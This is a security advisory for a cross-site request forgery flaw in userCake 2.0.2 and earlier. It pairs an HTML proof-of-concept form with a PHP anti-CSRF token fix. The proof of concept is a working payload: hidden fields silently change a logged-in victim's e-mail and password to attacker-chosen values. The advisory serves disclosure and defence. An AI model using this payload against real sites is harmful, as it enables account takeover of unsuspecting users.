# Exploit Title: Cross-Site Request Forgery vulnerability
# Software: userCake
# Software Link: http://usercake.com/downloads/userCakeV2.0.2.zip
# Version: <=2.0.2
# Author: Dolev Farhi; dolev(at)openflare(dot)org
# Date: 24.5.2014
# Tested on: Kali Linux
# Vendor homepage: usercake.com
# Vendor alert date: 23.5.2014
1. About the application:
Usercake's goal is to provide a secure user management system which can easily be adapted to any project's needs.
It is cleanly written, well documented and easily modified.
It comes with a strong backbone of tools and functions necessary for user management and has an active community of developers and enthusiasts able to provide support for your project.
2. Vulnerability Description:
userCake's state-changing forms carry no anti-CSRF request tokens, making the application vulnerable to cross-site request forgery (CSRF). An attacker can change the administrator's password and e-mail address through a forged request.
3. Exploit / Proof of concept:
<html>
<!-- CSRF example for userCake -->
<body>
<div align="center">
<h2><b>userCake CSRF proof of concept</b></h2>
<h4>Prerequisite: the victim must be logged in to the application before submitting</h4>
<pre>
<!-- The visible field asks for the victim's current password; the hidden fields
     supply the new e-mail address and the new password plus its confirmation. -->
<form action="http://usercake.com/user_settings.php" method="POST">
Enter <u>CSRFTest</u> user account password to continue...
Username: <b>CSRFTest</b>
Password: <input type="password" name="password" size="10" required>
<input type="hidden" name="email" value="attacker@email.com" />
<input type="hidden" name="passwordc" value="HelloWorld" />
<input type="hidden" name="passwordcheck" value="HelloWorld" />
<input type="submit" name="submit" value="Submit" />
</form>
</pre>
</div>
</body>
</html>
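The missing control from section 2, shown as an added defensive example rather than userCake's own code: a synchronizer token kept in the PHP session, emitted as a hidden field in the settings form and verified before user_settings.php processes the POST. The function names csrf_token() and csrf_verify(), the field name csrf_token and the PHP 7.1+ requirement (random_bytes, nullable types) are assumptions of this example.

```php
<?php
// Added example, not part of userCake: synchronizer-token pattern for user_settings.php.
// Assumes PHP 7.1+ (random_bytes, hash_equals, nullable parameter types).
session_start();

// Return the per-session anti-CSRF token, creating it on first use.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex chars
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session copy in constant time.
function csrf_verify(?string $submitted): bool {
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject before touching email or password. A form served from another
    // origin (like the PoC above) cannot read the session token, so it is
    // unable to include a valid csrf_token field and is rejected here.
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        error_log('user_settings.php: CSRF token missing or invalid');
        exit('Invalid request token.');
    }
    // Existing password / e-mail update logic runs only after this point.
}
?>
<!-- The legitimate form carries the hidden token; the PoC form above does not. -->
<form action="user_settings.php" method="POST">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  Current password: <input type="password" name="password" required>
  New e-mail: <input type="email" name="email">
  New password: <input type="password" name="passwordc">
  Confirm: <input type="password" name="passwordcheck">
  <input type="submit" name="submit" value="Submit">
</form>
```

Regenerating the token on login (session_regenerate_id plus a fresh csrf_token) closes the window in which a pre-login token could be reused.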